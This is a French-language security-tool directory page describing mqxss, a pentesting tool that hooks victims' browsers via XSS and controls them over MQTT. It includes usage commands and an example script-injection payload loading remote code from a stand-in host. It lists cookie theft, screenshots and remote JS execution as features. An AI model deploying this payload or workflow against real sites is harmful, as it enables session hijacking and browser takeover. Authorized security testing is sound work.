Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mqxss — Communication de navigateur hooké via MQTT | Kitploit
Outils/GitHubGitHub/grampae/mqxss
Génération de PayloadsExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubgrampae/mqxss

mqxss

Communication de navigateur hooké via MQTT

Voir le dépôt
83il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

mqxss v0.2

mqxss agit comme un client pour communiquer avec des navigateurs hookés via MQTT

Screenshot from 2023-07-03 15-15-35

L'avantage d'utiliser cet outil plutôt que beef ou xsshunter est qu'en plus d'héberger le payload js, il n'y a aucune infrastructure à mettre en place. Vous pouvez utiliser un broker public (l'outil utilise actuellement de l'obfuscation ; le chiffrement est en cours de développement).

Les navigateurs hookés communiqueront sur le sujet MQTT (topic) du broker que vous spécifiez. Il existe de nombreux brokers publics/gratuits pour tester cela.

Le client utilise la bibliothèque Python paho.mqtt, tandis que le payload js utilise 'mqttws31.min.js', qu'il récupère depuis 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


Directions

Screenshot from 2024-01-17 11-34-59

Pour générer un payload JS afin de hooker des navigateurs, définissez le flag -g au moment de l'exécution, ainsi que les variables de votre broker, port et topic. Cela créera votre payload dans le dossier /js/.

Pour exécuter le client, fournissez votre broker, port et topic comme suit

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Télécharger l’outil

Pour exécuter le client avec des identifiants, fournissez votre broker, port, nom d'utilisateur, mot de passe et topic comme suit

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Envoyez votre payload XSS à la victime pendant que le client mqxss est en cours d'exécution, ex : '"><script src=https://example.com/x.js async></script> ou quelque chose de similaire. Si le site est vulnérable, vous devriez recevoir une notification indiquant que le navigateur s'est connecté, avec quelques informations de base, notamment les cookies, etc.

a


Fonctionnalités :

  • le payload js utilise MQTT QoS 1 et Last Will ; mqxss sera notifié des déconnexions ou connexions qui se produisent pendant que le client n'est pas connecté au broker
  • générer un payload js à l'exécution pour hooker des navigateurs
  • fonctionne actuellement uniquement avec les brokers MQTT qui utilisent des websockets sécurisés
  • ouvrir l'emplacement du navigateur hooké avec les cookies capturés dans le navigateur par commodité
  • une fois hooké, il récupère les cookies, l'IP, le type d'appareil, le user agent
  • visualiser les navigateurs précédemment hookés (déconnectés)
  • envoyer du js aux navigateurs actuellement hookés et obtenir une réponse si disponible
  • capture d'écran du navigateur hooké
  • définir le nom d'utilisateur et le mot de passe à l'exécution pour les brokers qui l'exigent
  • notification pushover en définissant les variables ptoken et userkey dans mqxss.py, puis en utilisant le flag de ligne de commande -po